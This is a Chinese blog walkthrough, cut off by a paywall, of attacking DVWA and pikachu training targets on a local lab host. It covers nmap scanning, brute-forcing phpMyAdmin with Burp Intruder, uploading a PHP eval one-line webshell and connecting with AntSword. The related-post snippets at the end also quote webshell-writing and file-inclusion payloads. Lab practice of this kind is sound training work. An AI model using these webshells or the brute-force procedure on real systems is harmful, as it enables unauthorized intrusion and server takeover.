从DVWA和pikachu上获得getshell

最新推荐文章于 2024-12-02 20:37:18 发布
最新推荐文章于 2024-12-02 20:37:18 发布
阅读量2.8k 收藏 1
点赞数
分类专栏: Web安全 文章标签: linux 安全 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/SYJ_361/article/details/122136562
版权

从DVWA和pikachu上获得getshell

文章目录

nmap扫描

nmap -sV -O -A -T4 192.168.1.9

可以看到扫描结果中有3个端口是打开的,分别为22、25、80端口,并且可以看到目标主机用的是Linux系统

image-20211224094719057

用御剑后台进行扫描

目标靶机地址

192.168.1.9

扫描结果如下:

image-20211224093215337

进入登录界面

http://192.168.1.9/phpmyadmin/db_create.php

image-20211224093414409

对账户密码进行暴力破解

打开burp suite对网页信息进行拦截

image-20211224093634184

拦截到的账户密码信息

image-20211224093703658

进入Intruder后,对【有效载荷集】进行设置后,进行暴力破解

image-20211224093909183

暴力破解结果如下:

得到账户和密码

账户:root
密码:123456

image-20211224100209247

方法1 从DVWA上获得getshell进行渗透

登录phpMyAdmin

进入靶场界面

http://192.168.1.9/index.html

image-20211225131354372

登录DVWA界面

image-20211225131810350

原本的账户密码:

账户:admin
密码:password

由于开始登录上面显示的账户密码未成功登录进去

所以我在phpMyAdmin查看DVWA数据库中的账户和密码

账户:admin
密码:7890
MD5码:cdaeb1282d614772beb1e74c192bebda

image-20211224111201720

image-20211224123811907

修改权限为low

image-20211224124912120

上传一句话木马

<?php @eval($_POST["xxb"]);?>

木马文件名为xxb.php

image-20211224131438934

用蚁剑进行连接

http://192.168.1.9/01/hackable/uploads/xxb.php

image-20211224131310552

连接成功后进入界面

最低0.47元/天 解锁文章
RCE远程代码执行漏洞(原理、危害、拼接字符、DVWApikachu、防御)
m0_61506558的博客
08-07 1471
什么是远程代码执行。
pikachu File Inclusion 文件包含漏洞 (皮卡丘漏洞平台通关系列)
箭雨镜屋
02-12 9451
一、来自官方的简介 pikachu中文件包含漏洞的概述如下 那么在下文中,File Inclusion(local)关卡会尝试读取系统敏感信息,并结合文件上传漏洞包含图片马,获取webshell;File Inclusion(remote)关卡会尝试直接包含木马,以及包含写入木马的文件。 二、来自小可爱的通关步骤 第一关 File Inclusion(local) -------的地方是个下拉框, 第二关File Inclusion(remote) ...
从命令执行到GetShell,适合新手学习
kali_Ma的博客
08-29 1446
最近做项目遇到一个比较典型命令执行漏洞,适合新手学习,给大家分享下整个过程。 从代码中可以看出来程序只使用trim()方法对jdk进行了两遍的空格过滤,然后直接后面拼接的命令一起执行。 接着来找一下这个方法的调用链, 可以看到这里依次调用了3个命令执行的方法,如果命令都能成功执行的话,可以执行3次。 然后找一下这个jdk参数是否是我们可控的, 上面的代码显示jdk这个参数是从请求中获取的,看到这里已经能确定是个命令执行漏洞了,下面我们来利用这个漏洞。 执行了ls&&结果报错,看显示
pikachu漏洞平台学习笔记6_File Inclusion
qq_38933307的博客
04-01 296
1.概述 文件包含,是一个功能。在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件中直接包含(引入)另外一个代码文件。 比如 在PHP中,提供了: include(),include_once() require(),require_once() 这些文件包含函数,这些函数在代码设计中被经常使用到。 大多数情况下,文件包含函数中包含的代码文件是固定的,因此也不会出现安全问题。 但是,有些时候,文件包含的代码文件被写成了一个变量,且这个变量可以由前端用户传进来,这种情况下,如果没
DVWA从注入到GETSHELL
weixin_30270889的博客
01-06 537
好好过你的生活,不要老是忙着告诉别人你在干嘛。 最近在复习学过的东西,自己就重新搭了个dvwa来学习新思路,写一些简单的脚本来练习写代码的能力。 众所周知SQL注入的危害是相当大的,对于每个老司机来说,如果发现注入点并可以利用的话,除了脱裤当然是猜解出管理员的用户名密码,后台登陆上传webshell了,虽然这些过程并不一定一路通顺,只是一般的流程,中途会遇到各种各样的问题,这些以后...
DVWA 不跳转_搭建dvwa环境学习从MySql注入到GetShell
weixin_39759989的博客
11-20 220
引言一转眼从刚开始看关于安全的基础书籍到现在已经十个月的时间了,对渗透测试的兴趣也不断的增加,由于刚开始工作的需求,只来得及看一些常见漏洞的基本原理就开始跟随老师傅开始渗透测试的工作。现在还记得第一次自己发现 xss激动的心情,师傅领进门,学习到了很多知识,后来因为工作原因到了安服务项目上去,三月粗糙的渗透测试能力不足以支撑在项目上有很好的实践,而且由于项目经过其他渗透测试人员千百遍的洗礼比较严重...
Pikachu-XXE
baynk的博客
11-19 4127
0x00 XXE -“xml external entity injection” 既"xml外部实体注入漏洞"。 概括一下就是"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题" 也就是说服务端接收解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。 现在很多语言里面对应的解析xml的函数默认是禁止解析外部实体内容的,从...
[红日安全]学习笔记1—SQL注入实战攻防(SQLMap、DVWAPikachu
ISNS的博客
04-21 1732
最近同学聊天: 是我太菜。
Docker一站式基础入门指南 —— 从安装到使用(使用部分以安装WEB应用为例)
qq_62564422的博客
02-02 600
Docker是一种开源的容器化平台,可以帮助开发者将应用程序及其依赖项打包到一个独立的容器中,然后可以在任何环境中运行这个容器。1. 应用程序部署:使用Docker可以将应用程序及其依赖项打包到一个容器中,然后在任何环境中运行这个容器,简化了应用程序部署的过程,并提高了应用程序的可移植性。3. 服务隔离:使用Docker可以将不同的服务部署在独立的容器中,实现服务之间的隔离,提高了系统的安全可靠性。容器生命周期管理:包括运行一个容器、停止一个容器、重启一个容器、杀死一个容器、删除一个容器等。
DVWA系列】二、Command Injection 命令注入(源码分析&python脚本实现&漏洞利用获取shell)
Pluto.的博客
03-12 1025
文章目录DVWACommand Injection 命令注入- 前言一、low级别二、medium级别三、high级别四、impossible级别五、漏洞利用- 获取目标shell DVWA Command Injection 命令注入 - 前言 命令拼接符:命令注入漏洞的利用,离不开命令拼接符 a & b: a、b命令互不影响,各自执行; a && b: a命令执行成功后,才会执行b命令; a | b:a命令的输出作为 b 的输入(a命令不论真假都会执行b命令); a || b
【SQL注入】从注入到获取服务器shell,记一次完整的SQL注入攻击过程
kkza的博客
10-28 2379
注入 以pikachu为例,首先发现一个数据查询的点,对其进行手工验证 易知存在SQL注入 写shell 通过mysql写入文件需满足 连接数据库是root用户 my.ini配置文件需明确secure_file_priv="目录",参考:MySQL读写文件 ...
DVWA文件包含漏洞
西电卢本伟的博客
03-30 2828
文章目录lowmediumhighimpossible文件上传+包含漏洞getshell云演-phar实验 low 1、本地文件包含: 看看后端代码 <?php // The page we wish to display $file = $_GET[ 'page' ]; ?> 发现没有对参数page进行任何的检查过滤,尝试包含一下phpinfo.php文件 提示错误,但是爆出了文件的绝对路径,此时有两种方法成功包含文件 方法一:利用得到的绝对路径 方法二:利用相对路径 2、远程
文件包含漏洞
Williamanddog的博客
01-29 300
程序开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件,而无需 再次编写,这种文件调用的过程一般被称为文件包含。程序开发人员一般希望代码更灵活,所以将被包 含的文件设置为变量,用来进行动态调用,但正是由于这种灵活性,从而导致客户端可以调用一个恶意 文件,造成文件包含漏洞。 在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件, 导致意外的文件泄露甚至恶意的代码注入。 。
DVWA-->01
2201_75556700的博客
12-02 1145
2、上传失败了,因为它不是真正的图片,所以,接下来,我们用一张真的图片,但是在图片里面添加php代码,将图片修改为txt添加完代码之后再改为png。5、文件包含访问刚刚上传的文件,看看能不能执行里面的php代码,成功访问到了文件,并且执行了php代码。3、以“../”跳转目录的方式,包含想访问的文件,的页面没有反应时,多输入几次../甚至更多次。6、得到上传成功的文件路径,开始包含文件,成功包含文件,并执行了php代码,拿到了shell。3、上传.txt文本的php代码,发现上传失败,只能上传图片。
DVWA-命令注入漏洞获取目标shell并提到最高权限[msfvenom]
King_Ho的博客
12-21 3402
MSF攻击Windows实验: 方法一 :通过web站点,使用无文件的方式攻击利用执行 方法二:通过web站点,上传webshell, 返回给msf 方法三:攻击其他端口服务,拿到meterpreter 信息收集-Nmap端口扫描 信息收集总在前 root@kali:~# nmap -sV -T4 xxx.xxx.xxx.xxx Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-29 10:46 CST Not shown: 992 filtered p
DVWA命令执行漏洞详解
nex1less的博客
07-19 1517
0x01 级别low 1.源码 Command Execution Source <?php if( isset( $_POST[ 'submit' ] ) ) { $target = $_REQUEST[ 'ip' ]; // Determine OS and execute the ping command. if (stristr(php...
手工挖洞学习笔记:dvwa命令执行漏洞/载入php反弹shell
AI_Jardon的博客
08-13 1443
命令执行漏洞 工具: (1)靶机:Metasploitable2 (2)nc (3)kali dvwa 代码审计:安全级别为low <?php if( isset( $_POST[ 'Submit' ] ) ) { // Get input $target = $_REQUEST[ 'ip' ]; // Determine OS and execute the ping command. if( stristr( php_uname( 's' ), 'Wi
DVWA笔记:利用文件包含漏洞(低级)获取webshell
m0_47470899的博客
01-28 1572
DVWA中文件包含漏洞(远程文件包含) 一、利用kali虚拟机建立服务器,并建立x.txt文件作为远程上传文件: 1、开启kali服务器,输入命令 service apache2 start 2、建立x.txt,在/var/www/html/目录下创建,内容为: <?fputs(fopen("shell60.php","w"),'<?php eval($_POST[moxi]);?>')?> 该代码执行时,将会创建一个名为shell60.php的一句话木马文件。后期通过菜刀软件连
dvwa 文件上传
一个安全研究员
04-20 6181
漏洞介绍 文件上传漏洞可以说是危害很大了,因为可以直接通过此漏洞getshell。漏洞原因简单点说就是由于开发人员或者网站运维人员的一些失误导致用户上传的文件可以被服务器当作脚本(可执行文件)解析执行。但是想要成功利用这个漏洞至少需要满足三个条件: A.有效上传点 B.上传文件能够被解析执行 C.上传的文件能够被访问到 low 由于我是搭建在wamp环境下的,所以我试着上传一个ph...
DVWA+pikachu靶场搭建
最新发布
03-15
好的,我现在需要帮助用户了解如何搭建DVWAPikachu靶场。用户提到了几个引用链接,我需要先仔细查看这些引用的内容,然后整合出一个清晰的步骤指南。 首先,引用[1][2]提到了使用phpStudy来搭建DVWAPikachu...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值